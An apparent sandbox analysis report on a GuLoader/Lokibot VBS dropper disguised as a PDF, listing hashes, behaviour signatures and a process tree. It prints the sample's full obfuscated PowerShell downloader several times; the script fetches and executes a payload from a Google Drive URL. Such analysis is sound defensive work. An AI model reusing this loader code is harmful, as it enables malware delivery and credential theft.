Overview

overview

10

Static

static

1

DIR-A_FB09...df.vbs

windows7-x64

10

DIR-A_FB09...df.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2024 04:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    DIR-A_FB09948533·pdf.vbs

  • Size

    30KB

  • MD5

    49d5272b8014434052ef33b7c97a319d

  • SHA1

    c34b95243db9a907c89a4fa681b5d12c61005b17

  • SHA256

    1fa08709ae1b0ca4825289fdb001667fbf84708a8d54449d64fd67305e32a89f

  • SHA512

    545f3539790b517f333bc692847de515cb26f9e54effd3a0b8d45618137b9b53c6249f284ec4e187d69ef8b920293a7e5bc83cc6ba7952b1a9a0e1499f33de7a

  • SSDEEP

    384:3T7K96V92hyapNNQpMqEklVL25U/gmEim9JxH8CHsuLQSTzF4spQEtENUYkda3LM:j7Kk+5opb6LqFZdv8ia9NaJfw3

Score
10/10
guloaderlokibotcollectiondiscoverydownloaderexecutionspywarestealertrojan

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Network Service Discovery 1 TTPs 3 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DIR-A_FB09948533·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:400
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Wienerschnitzlens Explicableness Ombygningskontoernes #>;$Tekstgruppers='Mobolatry';<#Slambrnds Ghaist Lsterne Ulves #>;$Saggitarius129=$host.PrivateData;If ($Saggitarius129) {$Afvandingerne++;}function Forunderlige($Tinkler){$Tmrerlrer=$Tinkler.Length-$Afvandingerne;for( $Armbindenes=5;$Armbindenes -lt $Tmrerlrer;$Armbindenes+=6){$Amorinerne+=$Tinkler[$Armbindenes];}$Amorinerne;}function middelvejen($Genskabelsen){ . ($cognizableness) ($Genskabelsen);}$Konsultationstiderne=Forunderlige ' TypeMBatfooDenatzMaideiSeierlC,ocklsemosa ,lep/ Unaf5.nder. A it0Mi ex Mindr(PrepuW ProviCopihnStarsdRododofrstew Autossinde RunneNFeterTVampy Skif1 Undi0Ungli.Firs,0parab; Pr.b Sev,nWtrovaiEnev n Phr 6Hals 4 Brah;Bedaa FlotixRejse6Intra4 ydbl; T,ra BrowsrBima vForfa: Full1plu i2 ama1Prang.Auth,0Antim) .ejr DistrGBeaveeTremecHa vfkScat osopor/Met.o2 Chri0later1Rootc0 Skak0Ar,ej1H rmo0Aands1Angr O,oesFTou,hiAlterrDygtie SnakfCeil oVilj xPol.c/Cinem1Crimi2 su e1Teks,.frekv0 kilt ';$Spireevnes=Forunderlige 'Forfnu,lcersdesegeInde R Aris-K ovbA FrdiGThermematriNRouseTGarac ';$Creatureling=Forunderlige 'AffrdhTheoltDiab.tbredspcottasStrif: Tale/a.pes/Stagvd BlinrEnu,ciR asav BulleArnbe.PaedogRe opoPetrioSimulgfunfalLa,dkeHy er.Wi kic IonioLgelfmRepar/Ove tuW ntockonve?Oly peTopmixLsegrp ThaloHolohrHumant olys=Punc,dOrganoUni owUnco.nfa.thlcent,oIrru aWhitedDab,l& SnatiUnhond In p=Isoga1RadiotS.oledK.aneeIndrezKurtiETumoraAftenU.algaYInco.8LovreXTilgof AmmeiBa grMUdk yiKarr,MReg ee Selvj Sap.SFdekdvRampePOmskaHFdestI SaudVStats7 krmyAThrusr Udst4 LenohTilraC ,ninBUkyndj Bes nklarg ';$Frgemnds=Forunderlige ' Mi.t>Irrep ';$cognizableness=Forunderlige ' emori S ipEDiverXRi.ik ';$Hippuritic='Kinaesthetically192';$pinfish = Forunderlige ' NexueNormacSouarhHurtio Rec Semio%AmblyaC emppp,rkep ndudDrammaOarwetFrumpa Poul%Foren\CampiRSmoo o ryllsLicenernn nlsafroiIntertSkrabeKumul.SociaGRebore KvstnIncti Stren&Sljfe&Luftn BrinteFyrstcBoardhEconooJeuxn .etftAskor ';middelvejen (Forunderlige 'Cyk.u$Gl,cegMet fl gresoRe tabTithiaEurasl Nonp:SeamiO.aratlOmstriDoub gG nero.elelmsubdee iderPo seyKlved=Bully( Univc SlvtmIncepdLysth Under/NebulcGamm. Scale$ ActipDho,ii Colon LittfFederiAfmatsNedjuhTilke)Koeff ');middelvejen (Forunderlige 'Stoke$ se,egExencl S ino Tr bbGiggeaskaanl Scha:SupraUIn trdDat,eo Telemsubado FikegHumi r.cquiaFor bp SynohDobb.= Impr$ OverCModulrHa aneSweeta OdiotNo uluBlg trRep seGevinlDe,uliMet enBo ingFoxli. Fgtes eropEnc plskopuiC ntat Enkl(Unemp$ReinvFFaksir SawagflytteFinanm.rablnEntamdhangdsOscin)Pi.id ');middelvejen (Forunderlige ' Hjer[T merNHydroeFluket,illy.Bje gSBogfreMus arBiancvfungiiSpontcFo,sae,hromPFlavooS,vebiShephnTyve,tInstrMInferaHy henHamaraBn,elgUreaseLyvenrVok l] Ch,n:Sab,b:ProtrSSkabheBecalcDatabuS rtir ratiGardet dsonycontoPTeorerQuacko,eviatScrapoFreigc Noneoq aiflpolar Bygg=To,nd Trakt[Phil,N dulae,verbtP,ysi.SpindSDdsdmeBank c.littuHalvarRe,ppitranstBarn yUnd rPFe ourAsyleoRejset Fad oR,ffack bbao B rnlKagesTPr,sryF raap Drgeesidst] Su c:Sulfa:TvaerTKrsell,dsklsUdgru1Tmmer2Rgsvr ');$Creatureling=$Udomograph[0];$Aerography= (Forunderlige 'Boyco$LedigGSol ilLedtoo JuicB A trASlingl Ped.: MimoBAeropaSl,mpgTweetA Ga rGUn areDeflar beneUF ldsMLuddemHytteEStroft Bras=EgretnBagvee LilawRein -Hag.rOUnperb PrimJMen uEGu,mdcFugletMiscr ToastSBlindYSvajeSBre ktNasioELeninM Kal .MilieN R beE OverTUncle.HydroWDekode anflbUdkrac Fejll Du liBlgedERambuntildkT');$Aerography+=$Oligomery[1];middelvejen ($Aerography);middelvejen (Forunderlige 'Dirha$NonroBBushwabilg.gI dvaacanalg Paa e atinrBulleuIndlem ScrumTrfaee SvintKilde.shallHSamf eTyktaaPs,uddProloeBabeorBygnisLnfor[To,al$NettiSBy nipFus liIntrarStar,e uguee Festv Metrn awnbe.ygtesPappe]Kurs.=Pa,cr$rumplKAdveroSlgtsnPreadsColumusqueel T kstClea aMollitNatioiMageloFel inLocoms verrtgrazeiSkjoldChalceSignorIndvenUnpeaeresig ');$Referentielles=Forunderlige ' Uds.$TumblBFormla ProggSkodsaCroucg brdseForkorIchthuMegadmNuclemLognoe,rivgtTe si.ForlaDSnvleoElektwAzo in paaklGimm oShtokaKlubkdvedliFCurbsiSentilGnosteHilar(sydst$AfkriCSpru.rBankheEighta ndust Repou bertrOv rweJukeblDepori IscenhaloxgPenci, nakk$UncroA mancuTu ort olysoascarpPoi thTransoHele bNik ey Arbe) Su d ';$Autophoby=$Oligomery[0];middelvejen (Forunderlige 'Ringb$UfejlgRe,erLTombaoRe,ffBYouthaspagnLRydde:DiscoG ValsREn,ykaSt ndsInvigsSliddeletforSialoE.ramb=State(Sone tPadsheV dunSChatstDiago-Tingep artoaSer,eTClothh Fort Salon$AntenaForlsuPrestt davioI,sidPChaush Hoa OOstrab UddayMedar)Ro ai ');while (!$Grassere) {middelvejen (Forunderlige 'Pries$ DanugT ktllSpexeoafkolb orbeaBindiletabl:Lik iBSelvre Red gpockerCovene RevytSubcasBa gu=Subur$Mnemot U.rer .ensuAffieeSammm ') ;middelvejen $Referentielles;middelvejen (Forunderlige 'Keg.eS EmnetTidsfalselarDrnletMetap-SproeSCatarl.oliteMedmeefer cpKonve M jor4Symbo ');middelvejen (Forunderlige 'Fodbo$Ho orgre.urlS,adooboglabOrignaStdsilLussi: rndiGtiremr Unjaa Knics k.ffsGas reScooprAbetteind,a= Folk(Pos aTHomomeIconos posttsamel-MarciPHj rnaVioletEle.th Vild Fral$SkyggAovermuHulebt unolo ntitp versh Mo toUnprob KramyEs.im)Unrom ') ;middelvejen (Forunderlige 'Pl,ds$ Plang hypolMentooPhal bColepa FelilIsenk: FormAUnmapr KandtG vfli Ant.lAtt.slBankfe DonkrAy idi tva,v rocre ColojSolut= Elon$Impiog Ascol rnseoFejlubE samaHandel Irre: MgleGAnsgei endanPostvgFlippl srayEnclomSupero OuphsStenbtPrejuoJointmAfsteoFjasiiPhasidInkor+Vitse+ R ds% Okap$Be,amUUntimdM,litoForkom F.edoTan egSe,iprSvingaSub ipBltesh,hill.svarecBlomsoforanuSaiyinAgyrit ,var ') ;$Creatureling=$Udomograph[$Artillerivej];}$Slaglernes=312458;$Menneskeliggrelses=29158;middelvejen (Forunderlige 'Fupma$R,smegChoktlmrkvroBahrabNondeaCom.el Un e:RecelB.yreka Se tg HissnEne geKa.me Schwe=Restr ImitaG KokeePhaset Supe-S,mmeCAffaro SoyanG nbrtOnan,eLeasen arot Prot raft$ AntiAStrayudiegitSta io NohupUdhngh ForaoTy.nibrknonySon,t ');middelvejen (Forunderlige 'Fibro$GumihgBidralBertioStiftbK.stpaChiasl I.fo:SmokeCryddeiDeserfKinsw Rauri=D.sil Var e[Ud ryS HillyGe,tusSkyputOmstieGlossmPlane.U resCMiltooRe,ienT gngvPort.eEks mrCornitSva p] Enwa: Hiat: rovFLapa.rTilt oReconmhav.gBLivslaDossesTi eteDiapa6 Syst4.rousSMottotUnsher ,idei PalinHvirvgBruge(Musik$Samt BProteaMultigSpradnFid.le T.tt)Bushe ');middelvejen (Forunderlige 'Demon$Sbye gHrde lVirk oTimiabChitcaSal.ilAkkom:PucetB.ransrDigetaCen rnTegnedMiljplPitmaiEthnonDhoongOveri Reku =Myxoc Ko,ku[ scheS,nestyteorisDruestMetd e AflsmAlbi .TeutoTPromeeAntisxOpsertForeh.EubraEDoublnPabulcNaturosamoydsu vei unnnJohangLjerl] heli:Freed:SituaAKolerSUnfreC HaanIherliIAlkoh.BrachGGlatmeProg,t MandS UnfutPanter Stemi umisnHermigCyril(noolo$SalgsCSpeediVldigf Deri)Rengr ');middelvejen (Forunderlige 'Stjed$vivisgPac.alDoxoloRele b Outwa G,mnlFord :G yceg Stylu lsdyn rapnJagtbyRund sNondiaKiwitcStrafkFor ys Meye= bega$D illB.jenerFarvea BolinAadsed SkedlRntgeiIrretnTilvng U sa.Afsens BeekuExtrebUn cesH.emmtHer ar utomi ohlnPur ug Mu.g(Corra$LeddeS BodylRampaa KinsgDiogelPrevietvrb,rturdenBloddeSafinsSerai,Sis u$Rho iMNotabeCorsenKondin VarleDk etsTiltakKasseeSpecil abouiIk esg AgnigUnd,prDosere Maril ndifsKen.eegennes .tte) team ');middelvejen $gunnysacks;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2372
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Roselite.Gen && echo t"
        3⤵
          PID:2664
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Wienerschnitzlens Explicableness Ombygningskontoernes #>;$Tekstgruppers='Mobolatry';<#Slambrnds Ghaist Lsterne Ulves #>;$Saggitarius129=$host.PrivateData;If ($Saggitarius129) {$Afvandingerne++;}function Forunderlige($Tinkler){$Tmrerlrer=$Tinkler.Length-$Afvandingerne;for( $Armbindenes=5;$Armbindenes -lt $Tmrerlrer;$Armbindenes+=6){$Amorinerne+=$Tinkler[$Armbindenes];}$Amorinerne;}function middelvejen($Genskabelsen){ . ($cognizableness) ($Genskabelsen);}$Konsultationstiderne=Forunderlige ' TypeMBatfooDenatzMaideiSeierlC,ocklsemosa ,lep/ Unaf5.nder. A it0Mi ex Mindr(PrepuW ProviCopihnStarsdRododofrstew Autossinde RunneNFeterTVampy Skif1 Undi0Ungli.Firs,0parab; Pr.b Sev,nWtrovaiEnev n Phr 6Hals 4 Brah;Bedaa FlotixRejse6Intra4 ydbl; T,ra BrowsrBima vForfa: Full1plu i2 ama1Prang.Auth,0Antim) .ejr DistrGBeaveeTremecHa vfkScat osopor/Met.o2 Chri0later1Rootc0 Skak0Ar,ej1H rmo0Aands1Angr O,oesFTou,hiAlterrDygtie SnakfCeil oVilj xPol.c/Cinem1Crimi2 su e1Teks,.frekv0 kilt ';$Spireevnes=Forunderlige 'Forfnu,lcersdesegeInde R Aris-K ovbA FrdiGThermematriNRouseTGarac ';$Creatureling=Forunderlige 'AffrdhTheoltDiab.tbredspcottasStrif: Tale/a.pes/Stagvd BlinrEnu,ciR asav BulleArnbe.PaedogRe opoPetrioSimulgfunfalLa,dkeHy er.Wi kic IonioLgelfmRepar/Ove tuW ntockonve?Oly peTopmixLsegrp ThaloHolohrHumant olys=Punc,dOrganoUni owUnco.nfa.thlcent,oIrru aWhitedDab,l& SnatiUnhond In p=Isoga1RadiotS.oledK.aneeIndrezKurtiETumoraAftenU.algaYInco.8LovreXTilgof AmmeiBa grMUdk yiKarr,MReg ee Selvj Sap.SFdekdvRampePOmskaHFdestI SaudVStats7 krmyAThrusr Udst4 LenohTilraC ,ninBUkyndj Bes nklarg ';$Frgemnds=Forunderlige ' Mi.t>Irrep ';$cognizableness=Forunderlige ' emori S ipEDiverXRi.ik ';$Hippuritic='Kinaesthetically192';$pinfish = Forunderlige ' NexueNormacSouarhHurtio Rec Semio%AmblyaC emppp,rkep ndudDrammaOarwetFrumpa Poul%Foren\CampiRSmoo o ryllsLicenernn nlsafroiIntertSkrabeKumul.SociaGRebore KvstnIncti Stren&Sljfe&Luftn BrinteFyrstcBoardhEconooJeuxn .etftAskor ';middelvejen (Forunderlige 'Cyk.u$Gl,cegMet fl gresoRe tabTithiaEurasl Nonp:SeamiO.aratlOmstriDoub gG nero.elelmsubdee iderPo seyKlved=Bully( Univc SlvtmIncepdLysth Under/NebulcGamm. Scale$ ActipDho,ii Colon LittfFederiAfmatsNedjuhTilke)Koeff ');middelvejen (Forunderlige 'Stoke$ se,egExencl S ino Tr bbGiggeaskaanl Scha:SupraUIn trdDat,eo Telemsubado FikegHumi r.cquiaFor bp SynohDobb.= Impr$ OverCModulrHa aneSweeta OdiotNo uluBlg trRep seGevinlDe,uliMet enBo ingFoxli. Fgtes eropEnc plskopuiC ntat Enkl(Unemp$ReinvFFaksir SawagflytteFinanm.rablnEntamdhangdsOscin)Pi.id ');middelvejen (Forunderlige ' Hjer[T merNHydroeFluket,illy.Bje gSBogfreMus arBiancvfungiiSpontcFo,sae,hromPFlavooS,vebiShephnTyve,tInstrMInferaHy henHamaraBn,elgUreaseLyvenrVok l] Ch,n:Sab,b:ProtrSSkabheBecalcDatabuS rtir ratiGardet dsonycontoPTeorerQuacko,eviatScrapoFreigc Noneoq aiflpolar Bygg=To,nd Trakt[Phil,N dulae,verbtP,ysi.SpindSDdsdmeBank c.littuHalvarRe,ppitranstBarn yUnd rPFe ourAsyleoRejset Fad oR,ffack bbao B rnlKagesTPr,sryF raap Drgeesidst] Su c:Sulfa:TvaerTKrsell,dsklsUdgru1Tmmer2Rgsvr ');$Creatureling=$Udomograph[0];$Aerography= (Forunderlige 'Boyco$LedigGSol ilLedtoo JuicB A trASlingl Ped.: MimoBAeropaSl,mpgTweetA Ga rGUn areDeflar beneUF ldsMLuddemHytteEStroft Bras=EgretnBagvee LilawRein -Hag.rOUnperb PrimJMen uEGu,mdcFugletMiscr ToastSBlindYSvajeSBre ktNasioELeninM Kal .MilieN R beE OverTUncle.HydroWDekode anflbUdkrac Fejll Du liBlgedERambuntildkT');$Aerography+=$Oligomery[1];middelvejen ($Aerography);middelvejen (Forunderlige 'Dirha$NonroBBushwabilg.gI dvaacanalg Paa e atinrBulleuIndlem ScrumTrfaee SvintKilde.shallHSamf eTyktaaPs,uddProloeBabeorBygnisLnfor[To,al$NettiSBy nipFus liIntrarStar,e uguee Festv Metrn awnbe.ygtesPappe]Kurs.=Pa,cr$rumplKAdveroSlgtsnPreadsColumusqueel T kstClea aMollitNatioiMageloFel inLocoms verrtgrazeiSkjoldChalceSignorIndvenUnpeaeresig ');$Referentielles=Forunderlige ' Uds.$TumblBFormla ProggSkodsaCroucg brdseForkorIchthuMegadmNuclemLognoe,rivgtTe si.ForlaDSnvleoElektwAzo in paaklGimm oShtokaKlubkdvedliFCurbsiSentilGnosteHilar(sydst$AfkriCSpru.rBankheEighta ndust Repou bertrOv rweJukeblDepori IscenhaloxgPenci, nakk$UncroA mancuTu ort olysoascarpPoi thTransoHele bNik ey Arbe) Su d ';$Autophoby=$Oligomery[0];middelvejen (Forunderlige 'Ringb$UfejlgRe,erLTombaoRe,ffBYouthaspagnLRydde:DiscoG ValsREn,ykaSt ndsInvigsSliddeletforSialoE.ramb=State(Sone tPadsheV dunSChatstDiago-Tingep artoaSer,eTClothh Fort Salon$AntenaForlsuPrestt davioI,sidPChaush Hoa OOstrab UddayMedar)Ro ai ');while (!$Grassere) {middelvejen (Forunderlige 'Pries$ DanugT ktllSpexeoafkolb orbeaBindiletabl:Lik iBSelvre Red gpockerCovene RevytSubcasBa gu=Subur$Mnemot U.rer .ensuAffieeSammm ') ;middelvejen $Referentielles;middelvejen (Forunderlige 'Keg.eS EmnetTidsfalselarDrnletMetap-SproeSCatarl.oliteMedmeefer cpKonve M jor4Symbo ');middelvejen (Forunderlige 'Fodbo$Ho orgre.urlS,adooboglabOrignaStdsilLussi: rndiGtiremr Unjaa Knics k.ffsGas reScooprAbetteind,a= Folk(Pos aTHomomeIconos posttsamel-MarciPHj rnaVioletEle.th Vild Fral$SkyggAovermuHulebt unolo ntitp versh Mo toUnprob KramyEs.im)Unrom ') ;middelvejen (Forunderlige 'Pl,ds$ Plang hypolMentooPhal bColepa FelilIsenk: FormAUnmapr KandtG vfli Ant.lAtt.slBankfe DonkrAy idi tva,v rocre ColojSolut= Elon$Impiog Ascol rnseoFejlubE samaHandel Irre: MgleGAnsgei endanPostvgFlippl srayEnclomSupero OuphsStenbtPrejuoJointmAfsteoFjasiiPhasidInkor+Vitse+ R ds% Okap$Be,amUUntimdM,litoForkom F.edoTan egSe,iprSvingaSub ipBltesh,hill.svarecBlomsoforanuSaiyinAgyrit ,var ') ;$Creatureling=$Udomograph[$Artillerivej];}$Slaglernes=312458;$Menneskeliggrelses=29158;middelvejen (Forunderlige 'Fupma$R,smegChoktlmrkvroBahrabNondeaCom.el Un e:RecelB.yreka Se tg HissnEne geKa.me Schwe=Restr ImitaG KokeePhaset Supe-S,mmeCAffaro SoyanG nbrtOnan,eLeasen arot Prot raft$ AntiAStrayudiegitSta io NohupUdhngh ForaoTy.nibrknonySon,t ');middelvejen (Forunderlige 'Fibro$GumihgBidralBertioStiftbK.stpaChiasl I.fo:SmokeCryddeiDeserfKinsw Rauri=D.sil Var e[Ud ryS HillyGe,tusSkyputOmstieGlossmPlane.U resCMiltooRe,ienT gngvPort.eEks mrCornitSva p] Enwa: Hiat: rovFLapa.rTilt oReconmhav.gBLivslaDossesTi eteDiapa6 Syst4.rousSMottotUnsher ,idei PalinHvirvgBruge(Musik$Samt BProteaMultigSpradnFid.le T.tt)Bushe ');middelvejen (Forunderlige 'Demon$Sbye gHrde lVirk oTimiabChitcaSal.ilAkkom:PucetB.ransrDigetaCen rnTegnedMiljplPitmaiEthnonDhoongOveri Reku =Myxoc Ko,ku[ scheS,nestyteorisDruestMetd e AflsmAlbi .TeutoTPromeeAntisxOpsertForeh.EubraEDoublnPabulcNaturosamoydsu vei unnnJohangLjerl] heli:Freed:SituaAKolerSUnfreC HaanIherliIAlkoh.BrachGGlatmeProg,t MandS UnfutPanter Stemi umisnHermigCyril(noolo$SalgsCSpeediVldigf Deri)Rengr ');middelvejen (Forunderlige 'Stjed$vivisgPac.alDoxoloRele b Outwa G,mnlFord :G yceg Stylu lsdyn rapnJagtbyRund sNondiaKiwitcStrafkFor ys Meye= bega$D illB.jenerFarvea BolinAadsed SkedlRntgeiIrretnTilvng U sa.Afsens BeekuExtrebUn cesH.emmtHer ar utomi ohlnPur ug Mu.g(Corra$LeddeS BodylRampaa KinsgDiogelPrevietvrb,rturdenBloddeSafinsSerai,Sis u$Rho iMNotabeCorsenKondin VarleDk etsTiltakKasseeSpecil abouiIk esg AgnigUnd,prDosere Maril ndifsKen.eegennes .tte) team ');middelvejen $gunnysacks;"
          3⤵
          • Network Service Discovery
          • Suspicious use of WriteProcessMemory
          PID:2100
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Wienerschnitzlens Explicableness Ombygningskontoernes #>;$Tekstgruppers='Mobolatry';<#Slambrnds Ghaist Lsterne Ulves #>;$Saggitarius129=$host.PrivateData;If ($Saggitarius129) {$Afvandingerne++;}function Forunderlige($Tinkler){$Tmrerlrer=$Tinkler.Length-$Afvandingerne;for( $Armbindenes=5;$Armbindenes -lt $Tmrerlrer;$Armbindenes+=6){$Amorinerne+=$Tinkler[$Armbindenes];}$Amorinerne;}function middelvejen($Genskabelsen){ . ($cognizableness) ($Genskabelsen);}$Konsultationstiderne=Forunderlige ' TypeMBatfooDenatzMaideiSeierlC,ocklsemosa ,lep/ Unaf5.nder. A it0Mi ex Mindr(PrepuW ProviCopihnStarsdRododofrstew Autossinde RunneNFeterTVampy Skif1 Undi0Ungli.Firs,0parab; Pr.b Sev,nWtrovaiEnev n Phr 6Hals 4 Brah;Bedaa FlotixRejse6Intra4 ydbl; T,ra BrowsrBima vForfa: Full1plu i2 ama1Prang.Auth,0Antim) .ejr DistrGBeaveeTremecHa vfkScat osopor/Met.o2 Chri0later1Rootc0 Skak0Ar,ej1H rmo0Aands1Angr O,oesFTou,hiAlterrDygtie SnakfCeil oVilj xPol.c/Cinem1Crimi2 su e1Teks,.frekv0 kilt ';$Spireevnes=Forunderlige 'Forfnu,lcersdesegeInde R Aris-K ovbA FrdiGThermematriNRouseTGarac ';$Creatureling=Forunderlige 'AffrdhTheoltDiab.tbredspcottasStrif: Tale/a.pes/Stagvd BlinrEnu,ciR asav BulleArnbe.PaedogRe opoPetrioSimulgfunfalLa,dkeHy er.Wi kic IonioLgelfmRepar/Ove tuW ntockonve?Oly peTopmixLsegrp ThaloHolohrHumant olys=Punc,dOrganoUni owUnco.nfa.thlcent,oIrru aWhitedDab,l& SnatiUnhond In p=Isoga1RadiotS.oledK.aneeIndrezKurtiETumoraAftenU.algaYInco.8LovreXTilgof AmmeiBa grMUdk yiKarr,MReg ee Selvj Sap.SFdekdvRampePOmskaHFdestI SaudVStats7 krmyAThrusr Udst4 LenohTilraC ,ninBUkyndj Bes nklarg ';$Frgemnds=Forunderlige ' Mi.t>Irrep ';$cognizableness=Forunderlige ' emori S ipEDiverXRi.ik ';$Hippuritic='Kinaesthetically192';$pinfish = Forunderlige ' NexueNormacSouarhHurtio Rec Semio%AmblyaC emppp,rkep ndudDrammaOarwetFrumpa Poul%Foren\CampiRSmoo o ryllsLicenernn nlsafroiIntertSkrabeKumul.SociaGRebore KvstnIncti Stren&Sljfe&Luftn BrinteFyrstcBoardhEconooJeuxn .etftAskor ';middelvejen (Forunderlige 'Cyk.u$Gl,cegMet fl gresoRe tabTithiaEurasl Nonp:SeamiO.aratlOmstriDoub gG nero.elelmsubdee iderPo seyKlved=Bully( Univc SlvtmIncepdLysth Under/NebulcGamm. Scale$ ActipDho,ii Colon LittfFederiAfmatsNedjuhTilke)Koeff ');middelvejen (Forunderlige 'Stoke$ se,egExencl S ino Tr bbGiggeaskaanl Scha:SupraUIn trdDat,eo Telemsubado FikegHumi r.cquiaFor bp SynohDobb.= Impr$ OverCModulrHa aneSweeta OdiotNo uluBlg trRep seGevinlDe,uliMet enBo ingFoxli. Fgtes eropEnc plskopuiC ntat Enkl(Unemp$ReinvFFaksir SawagflytteFinanm.rablnEntamdhangdsOscin)Pi.id ');middelvejen (Forunderlige ' Hjer[T merNHydroeFluket,illy.Bje gSBogfreMus arBiancvfungiiSpontcFo,sae,hromPFlavooS,vebiShephnTyve,tInstrMInferaHy henHamaraBn,elgUreaseLyvenrVok l] Ch,n:Sab,b:ProtrSSkabheBecalcDatabuS rtir ratiGardet dsonycontoPTeorerQuacko,eviatScrapoFreigc Noneoq aiflpolar Bygg=To,nd Trakt[Phil,N dulae,verbtP,ysi.SpindSDdsdmeBank c.littuHalvarRe,ppitranstBarn yUnd rPFe ourAsyleoRejset Fad oR,ffack bbao B rnlKagesTPr,sryF raap Drgeesidst] Su c:Sulfa:TvaerTKrsell,dsklsUdgru1Tmmer2Rgsvr ');$Creatureling=$Udomograph[0];$Aerography= (Forunderlige 'Boyco$LedigGSol ilLedtoo JuicB A trASlingl Ped.: MimoBAeropaSl,mpgTweetA Ga rGUn areDeflar beneUF ldsMLuddemHytteEStroft Bras=EgretnBagvee LilawRein -Hag.rOUnperb PrimJMen uEGu,mdcFugletMiscr ToastSBlindYSvajeSBre ktNasioELeninM Kal .MilieN R beE OverTUncle.HydroWDekode anflbUdkrac Fejll Du liBlgedERambuntildkT');$Aerography+=$Oligomery[1];middelvejen ($Aerography);middelvejen (Forunderlige 'Dirha$NonroBBushwabilg.gI dvaacanalg Paa e atinrBulleuIndlem ScrumTrfaee SvintKilde.shallHSamf eTyktaaPs,uddProloeBabeorBygnisLnfor[To,al$NettiSBy nipFus liIntrarStar,e uguee Festv Metrn awnbe.ygtesPappe]Kurs.=Pa,cr$rumplKAdveroSlgtsnPreadsColumusqueel T kstClea aMollitNatioiMageloFel inLocoms verrtgrazeiSkjoldChalceSignorIndvenUnpeaeresig ');$Referentielles=Forunderlige ' Uds.$TumblBFormla ProggSkodsaCroucg brdseForkorIchthuMegadmNuclemLognoe,rivgtTe si.ForlaDSnvleoElektwAzo in paaklGimm oShtokaKlubkdvedliFCurbsiSentilGnosteHilar(sydst$AfkriCSpru.rBankheEighta ndust Repou bertrOv rweJukeblDepori IscenhaloxgPenci, nakk$UncroA mancuTu ort olysoascarpPoi thTransoHele bNik ey Arbe) Su d ';$Autophoby=$Oligomery[0];middelvejen (Forunderlige 'Ringb$UfejlgRe,erLTombaoRe,ffBYouthaspagnLRydde:DiscoG ValsREn,ykaSt ndsInvigsSliddeletforSialoE.ramb=State(Sone tPadsheV dunSChatstDiago-Tingep artoaSer,eTClothh Fort Salon$AntenaForlsuPrestt davioI,sidPChaush Hoa OOstrab UddayMedar)Ro ai ');while (!$Grassere) {middelvejen (Forunderlige 'Pries$ DanugT ktllSpexeoafkolb orbeaBindiletabl:Lik iBSelvre Red gpockerCovene RevytSubcasBa gu=Subur$Mnemot U.rer .ensuAffieeSammm ') ;middelvejen $Referentielles;middelvejen (Forunderlige 'Keg.eS EmnetTidsfalselarDrnletMetap-SproeSCatarl.oliteMedmeefer cpKonve M jor4Symbo ');middelvejen (Forunderlige 'Fodbo$Ho orgre.urlS,adooboglabOrignaStdsilLussi: rndiGtiremr Unjaa Knics k.ffsGas reScooprAbetteind,a= Folk(Pos aTHomomeIconos posttsamel-MarciPHj rnaVioletEle.th Vild Fral$SkyggAovermuHulebt unolo ntitp versh Mo toUnprob KramyEs.im)Unrom ') ;middelvejen (Forunderlige 'Pl,ds$ Plang hypolMentooPhal bColepa FelilIsenk: FormAUnmapr KandtG vfli Ant.lAtt.slBankfe DonkrAy idi tva,v rocre ColojSolut= Elon$Impiog Ascol rnseoFejlubE samaHandel Irre: MgleGAnsgei endanPostvgFlippl srayEnclomSupero OuphsStenbtPrejuoJointmAfsteoFjasiiPhasidInkor+Vitse+ R ds% Okap$Be,amUUntimdM,litoForkom F.edoTan egSe,iprSvingaSub ipBltesh,hill.svarecBlomsoforanuSaiyinAgyrit ,var ') ;$Creatureling=$Udomograph[$Artillerivej];}$Slaglernes=312458;$Menneskeliggrelses=29158;middelvejen (Forunderlige 'Fupma$R,smegChoktlmrkvroBahrabNondeaCom.el Un e:RecelB.yreka Se tg HissnEne geKa.me Schwe=Restr ImitaG KokeePhaset Supe-S,mmeCAffaro SoyanG nbrtOnan,eLeasen arot Prot raft$ 